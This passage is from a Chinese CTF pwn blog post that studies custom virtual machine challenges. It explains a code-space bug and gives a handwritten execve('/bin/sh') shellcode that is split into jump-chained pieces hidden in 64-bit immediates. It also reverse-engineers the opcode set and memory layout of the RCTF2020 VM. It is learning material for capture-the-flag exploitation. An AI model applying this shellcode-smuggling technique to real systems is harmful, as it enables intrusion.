<p>关于 handle 函数貌似并没有进行的优化，而是对原有的文件的处理，使用的是堆栈将原来的程序倒序储存进空间内。但是他这里的程序使用的汇编的指令比较少，add，sub，movabs，mul，dec，inc，rax 依旧是程序的返回值，所以最开始一定是对 rax 的初始化。程序的漏洞在于我们可用于储存指令的空间只有 0xff0，但是 mprotect 设置的是 0x1000. 而且程序在防止我们超出空间的时候检查是否小于 X+0xff0，但是如果我们控制知名的长度，将这个位置恰好覆盖为 shellcode。我们在写 add,sub 的汇编时，程序会将其全部转为 mov rbx,xxx,add rax,rbx. 我们可向内存中写入 8 字节的 64 位数，我们可以利用这个。在汇编中 \xeb 对应的指令默认的偏移量时 2，\xeb\x00 jmp 2. 结合上述，我们在第一个函数的结尾，向 0xff0 布置一个 i64, 使其跳转到某个存有 i64 的内存位置。我们通过这样多次跳转一步步完成 shellcoe 的布局，每次跳转栈两字节，所以每条指令不可以超过 6 字节。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line">push <span class="number">0x68732f</span></span><br><span class="line">pop rax</span><br><span class="line">jmp $?</span><br><span class="line"></span><br><span class="line">shl rax,<span class="number">0x20</span></span><br><span class="line">nop</span><br><span class="line">nop</span><br><span class="line">jmp $?</span><br><span class="line"></span><br><span class="line">add rax,<span class="number">0x6069622f</span></span><br><span class="line">jmp $?</span><br><span class="line"></span><br><span class="line">push rax</span><br><span class="line">mov rdi,rsp</span><br><span class="line">nop</span><br><span class="line">nop</span><br><span class="line">jmp $?</span><br><span class="line"></span><br><span class="line">xor rdx,rdx</span><br><span class="line">push <span class="number">0x39</span></span><br><span class="line">jmp $?</span><br><span class="line"></span><br><span class="line">xor rsi,rsi</span><br><span class="line">pop rax</span><br><span class="line">syscall</span><br></pre></td></tr></table></figure>
<p>RCTF2020</p>
<p>直接给出了手写的 vm 可执行程序，我们需要理清楚里面的函数逻辑。重点在与子进程中的两个函数</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">nums_IR = sub_1A75(file);                   // 解析我们输入的数据</span><br><span class="line">   sub_E99(file, nums_IR);</span><br></pre></td></tr></table></figure>
<p>首先当我们输入某种编码形式的指令后，第一个函数会检查我们的输入是否合法，并计算出我们输入了多少条完整的指令。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line">解析输入是否合法的时候，有一些op码，大致县分为三块，小于9，等于9以及大于9小于</span><br><span class="line">0	1	2	3三条指令，根据下1字节的标志，1：有一个寄存器和8字节的数据，0：两个寄存器</span><br><span class="line">	0					1:ADD RI,IMM64;		0:ADD RI,RI</span><br><span class="line">	1					1:SUB RI,IMM64;		0:SUB RI,RI</span><br><span class="line">	2					1:MUL RI,IMM64;		0:MUL RI,RI</span><br><span class="line">	3					1:DIV RI IMM64; 	0:DIV RI ,RI</span><br><span class="line">	</span><br><span class="line">	</span><br><span class="line">4	有一个标志位字节，条件1下，后面有9字节的任意数据，条件2需要两个寄存器</span><br><span class="line">		1:MOV RI,IMM64			;4			MOV RI,[IMM64]</span><br><span class="line">		8:MOV RI,RI				;0X10		MOV RI1,[RI2]</span><br><span class="line">		0X20:MOV [RI1],RI2</span><br><span class="line">5	一字节的寄存器号。将ptr+0x50 的值设置为寄存器中的值。    jmp ri</span><br><span class="line"></span><br><span class="line">6	一字节的数据标志位。1：AND RI,IMM64;		0: AND RI,RI</span><br><span class="line">7	p=1:1B，8B   XOR RI,IMM64;			p=0:1B,1B	XOR RI,RI				</span><br><span class="line">8	标志位	，1：或操作，or ri，imm64  ； 0：两个寄存器或操作，destri为第一个  XOR RI,RI</span><br><span class="line">9	需要一个寄存器，				2B长,设置寄存器		NOT RI</span><br><span class="line"></span><br><span class="line">10	需要一个标志位p,为0或者1，&#123;1的时候，后面又8字节的数据，使得ptr+0x40的指针地址-8，并设置为指针指向的值为value，为0的时候，后面紧跟一个寄存器,&#125;								push imm64/push ri</span><br><span class="line">11	检查ptr+88，要求非零，然后标志数值减一，后面还跟着一字节的数据.ptr+64指针指向的数据+8		pop RI</span><br><span class="line"></span><br><span class="line">12	需要1B的操作数，				 2BIR		指令跳转。1B的偏移量，默认+2(吓一个指令)</span><br><span class="line">13	对应一个4字节的value（size）				5B，ptr+72存的是指针数组，栈，这里会被释放，地址由ptr+92提供数组下标索引,size用于malloc的操作，			free旧的stack，创建一个新的</span><br><span class="line">14	无操作数							 1B		NOP</span><br><span class="line"></span><br><span class="line">初步分析，大概有8个寄存器（ (unsigned __int8)getbyte_value(position + 2) &gt; 7u）</span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p>vm_file 的结构体</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">0x0			R0</span><br><span class="line">0x8			R1</span><br><span class="line">0x10		R2</span><br><span class="line">0x18		R3</span><br><span class="line">0x20		R4</span><br><span class="line">0x28		R5</span><br><span class="line">0x30		R6</span><br><span class="line">0x38		R7</span><br><span class="line"></span><br><span class="line">0x40		malloc申请出来的指针 用作rsp</span><br><span class="line">0x48		chunk结束的地方，栈顶的地址		</span><br><span class="line"></span><br><span class="line">0x50		PC</span><br><span class="line">0x58(4B)		malloc后标记为0，stck是否为空，stack的length</span><br><span class="line">0x5c		chunk的实际空间大小,stack的字节大小</span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p>stack 是在 pc 之后申请的，通过 jmp 可以将微程序劫持到 vm_stack 上面，一字节的最大跳转时 0xff，pc 为 0x010 大小</p>

      <div class="tags">
          <a href="/tags/Learning/" rel="tag"><i class="ic i-tag"></i> Learning</a>
      </div>
  </div>

   <footer>

    <div class="meta">
  <span class="item">
    <span class="icon">
      <i class="ic i-calendar-check"></i>
    </span>
    <span class="text">Edited on</span>
    <time title="Modified: 2022-06-16 02:07:16" itemprop="dateModified" datetime="2022-06-16T02:07:16+08:00">2022-06-16</time>
  </span>
</div>

      
<div class="reward">
  <button><i class="ic i-heartbeat"></i> Donate</button>
  <p>Give me a cup of [coffee]~(￣▽￣)~*</p>
  <div id="qr">
      
      <div>
        <img data-src="/images/wechatpay.png" alt="dreamcat WeChat Pay">
        <p>WeChat Pay</p>
      </div>
      
      <div>
        <img data-src="/images/alipay.png" alt="dreamcat Alipay">
        <p>Alipay</p>
      </div>
      
      <div>
        <img data-src="/images/paypal.png" alt="dreamcat PayPal">
        <p>PayPal</p>
      </div>
  </div>
</div>

      

<div id="copyright">
<ul>
  <li class="author">
    <strong>Post author:  </strong>dreamcat <i class="ic i-at"><em>@</em></i>我他喵的
  </li>
  <li class="link">
    <strong>Post link: </strong>
    <a href="http://example.com/2022/06/11/vm%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/" title="vm学习笔记">http://example.com/2022/06/11/vm学习笔记/</a>
  </li>
  <li class="license">
    <strong>Copyright Notice:  </strong>All articles in this blog are licensed under <span class="exturl" data-url="aHR0cHM6Ly9jcmVhdGl2ZWNvbW1vbnMub3JnL2xpY2Vuc2VzL2J5LW5jLXNhLzQuMC9kZWVkLnpo"><i class="ic i-creative-commons"><em>(CC)</em></i>BY-NC-SA</span> unless stating additionally.
  </li>
</ul>
</div>

  </footer>

</article>

  </div>
  

<div class="post-nav">
    <div class="item left">
      

  <a href="/2022/06/03/%E9%AB%98%E7%89%88%E6%9C%ACglibc%E5%A0%86%E7%9A%84%E5%87%A0%E7%A7%8D%E5%88%A9%E7%94%A8%E6%89%8B%E6%B3%95/" itemprop="url" rel="prev" data-background-image="https:&#x2F;&#x2F;tva4.sinaimg.cn&#x2F;mw690&#x2F;6833939bly1gipexoj0moj20zk0m8kgu.jpg" title="高版本glibc堆的几种利用手法">
  <span class="type">Previous Post</span>
  <span class="category"><i class="ic i-flag"></i> </span>
  <h3>高版本glibc堆的几种利用手法</h3>
  </a>

    </div>
    <div class="item right">
      

  <a href="/2022/06/18/ciscn2022-syscall/" itemprop="url" rel="next" data-background-image="https:&#x2F;&#x2F;tva4.sinaimg.cn&#x2F;mw690&#x2F;6833939bly1gicis081o9j20zk0m8dmr.jpg" title="ciscn2022_syscall">
  <span class="type">Next Post</span>
  <span class="category"><i class="ic i-flag"></i> pwn</span>
  <h3>ciscn2022_syscall</h3>
  </a>

    </div>
</div>

  
  <div class="wrap" id="comments"></div>


        </div>
        <div id="sidebar">
          

<div class="inner">

  <div class="panels">
    <div class="inner">
      <div class="contents panel pjax" data-title="Contents">
          <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#vmlearning-%E7%AC%94%E8%AE%B0"><span class="toc-number">1.</span> <span class="toc-text"> vmlearning 笔记</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#ir%E4%BB%A3%E7%A0%81"><span class="toc-number">1.1.</span> <span class="toc-text"> IR 代码</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#ctf"><span class="toc-number">1.2.</span> <span class="toc-text"> ctf</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#ciscn2021-satool"><span class="toc-number">1.3.</span> <span class="toc-text"> ciscn2021 satool</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#save"><span class="toc-number">1.3.1.</span> <span class="toc-text"> save</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#takeaway"><span class="toc-number">1.3.2.</span> <span class="toc-text"> takeaway</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#stealkey"><span class="toc-number">1.3.3.</span> <span class="toc-text"> stealkey</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#fakekey"><span class="toc-number">1.3.4.</span> <span class="toc-text"> fakekey</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#run"><span class="toc-number">1.3.5.</span> <span class="toc-text"> run</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#ciscn-2022-satool"><span class="toc-number">1.4.</span> <span class="toc-text"> ciscn 2022 satool</span></a></li></ol></li></ol>
      </div>
      <div class="related panel pjax" data-title="Related">
      </div>
      <div class="overview panel" data-title="Overview">
        <div class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <img class="image" itemprop="image" alt="dreamcat"
      data-src="/images/avatar.jpg">
  <p class="name" itemprop="name">dreamcat</p>
  <div class="description" itemprop="description"></div>
</div>

<nav class="state">
    <div class="item posts">
      <a href="/archives/">
        <span class="count">33</span>
        <span class="name">posts</span>
      </a>
    </div>
    <div class="item categories">
      <a href="/categories/">
        <span class="count">4</span>
        <span class="name">categories</span>
      </a>
    </div>
    <div class="item tags">
      <a href="/tags/">
        <span class="count">8</span>
        <span class="name">tags</span>
      </a>
    </div>
</nav>

<div class="social">
</div>

<ul class="menu">
  
    
  <li class="item">
    <a href="/" rel="section"><i class="ic i-home"></i>Home</a>
  </li>


</ul>

      </div>
    </div>
  </div>

  <ul id="quick">
    <li class="prev pjax">
        <a href="/2022/06/03/%E9%AB%98%E7%89%88%E6%9C%ACglibc%E5%A0%86%E7%9A%84%E5%87%A0%E7%A7%8D%E5%88%A9%E7%94%A8%E6%89%8B%E6%B3%95/" rel="prev" title="Previous Post"><i class="ic i-chevron-left"></i></a>
    </li>
    <li class="up"><i class="ic i-arrow-up"></i></li>
    <li class="down"><i class="ic i-arrow-down"></i></li>
    <li class="next pjax">
        <a href="/2022/06/18/ciscn2022-syscall/" rel="next" title="Next Post"><i class="ic i-chevron-right"></i></a>
    </li>
    <li class="percent"></li>
  </ul>
</div>


        </div>
        <div class="dimmer"></div>
      </div>
    </main>
    <footer id="footer">
      <div class="inner">
        <div class="widgets">
          
<div class="rpost pjax">
  <h2>Random Posts</h2>
  <ul>
      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/pwn/" title="In pwn">pwn</a>
</div>

    <span><a href="/2022/06/18/ciscn2022-syscall/" title="ciscn2022_syscall">ciscn2022_syscall</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
</div>

    <span><a href="/2022/06/21/ciscn-2022-whatheap/" title="ciscn_2022_whatheap">ciscn_2022_whatheap</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
</div>

    <span><a href="/2022/06/23/test/test/" title="test">test</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
</div>

    <span><a href="/2022/06/03/%E9%AB%98%E7%89%88%E6%9C%ACglibc%E5%A0%86%E7%9A%84%E5%87%A0%E7%A7%8D%E5%88%A9%E7%94%A8%E6%89%8B%E6%B3%95/" title="高版本glibc堆的几种利用手法">高版本glibc堆的几种利用手法</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/pwn/" title="In pwn">pwn</a>
</div>

    <span><a href="/2022/04/18/starctf_examination/" title="examination">examination</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/pwn/" title="In pwn">pwn</a>
</div>

    <span><a href="/2022/06/20/ciscn-2022-planecoode/" title="ciscn_2022_planecoode">ciscn_2022_planecoode</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/pwn/" title="In pwn">pwn</a>
</div>

    <span><a href="/2022/03/19/pwnable-seethefile/" title="pwnable_seethefile">pwnable_seethefile</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/pwn/" title="In pwn">pwn</a>
</div>

    <span><a href="/2022/03/22/tw2017parrot/" title="tw2017parrot">tw2017parrot</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
</div>

    <span><a href="/2022/06/11/vm%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/" title="vm学习笔记">vm学习笔记</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/pwn/" title="In pwn">pwn</a>
</div>

    <span><a href="/2022/04/14/heap-paradise/" title="heap_paradise">heap_paradise</a></span>
  </li>

  </ul>
</div>
<div>
  <h2>Recent Comments</h2>
  <ul class="leancloud-recent-comment"></ul>
</div>

        </div>
        <div class="status">
  <div class="copyright">
    
    &copy; 2010 – 
    <span itemprop="copyrightYear">2022</span>
    <span class="with-love">
      <i class="ic i-sakura rotate"></i>
    </span>
    <span class="author" itemprop="copyrightHolder">dreamcat @ dreamcat</span>
  </div>
  <div class="count">
    <span class="post-meta-item-icon">
      <i class="ic i-chart-area"></i>
    </span>
    <span title="Symbols count total">282k words</span>

    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="ic i-coffee"></i>
    </span>
    <span title="Reading time total">4:16</span>
  </div>
  <div class="powered-by">
    Powered by <span class="exturl" data-url="aHR0cHM6Ly9oZXhvLmlv">Hexo</span> & Theme.<span class="exturl" data-url="aHR0cHM6Ly9naXRodWIuY29tL2FtZWhpbWUvaGV4by10aGVtZS1zaG9rYQ==">Shoka</span>
  </div>
</div>

      </div>
    </footer>
  </div>
<script data-config type="text/javascript">
  var LOCAL = {
    path: '2022/06/11/vm学习笔记/',
    favicon: {
      show: "（●´3｀●）Goooood",
      hide: "(´Д｀)dreamcat?"
    },
    search : {
      placeholder: "Search for Posts",
      empty: "We didn't find any results for the search: ${query}",
      stats: "${hits} results found in ${time} ms"
    },
    valine: true,fancybox: true,
    copyright: 'Copied to clipboard successfully! <br> All articles in this blog are licensed under <i class="ic i-creative-commons"></i>BY-NC-SA.',
    ignores : [
      function(uri) {
        return uri.includes('#');
      },
      function(uri) {
        return new RegExp(LOCAL.path+"$").test(uri);
      }
    ]
  };
</script>

<script src="https://cdn.polyfill.io/v2/polyfill.js"></script>

<script src="//cdn.jsdelivr.net/combine/npm/pace-js@1.0.2/pace.min.js,npm/pjax@0.2.8/pjax.min.js,npm/whatwg-fetch@3.4.0/dist/fetch.umd.min.js,npm/animejs@3.2.0/lib/anime.min.js,npm/algoliasearch@4/dist/algoliasearch-lite.umd.js,npm/instantsearch.js@4/dist/instantsearch.production.min.js,npm/lozad@1/dist/lozad.min.js,npm/quicklink@2/dist/quicklink.umd.js"></script>

<script src="/js/app.js?v=0.2.5"></script>




</body>
</html>
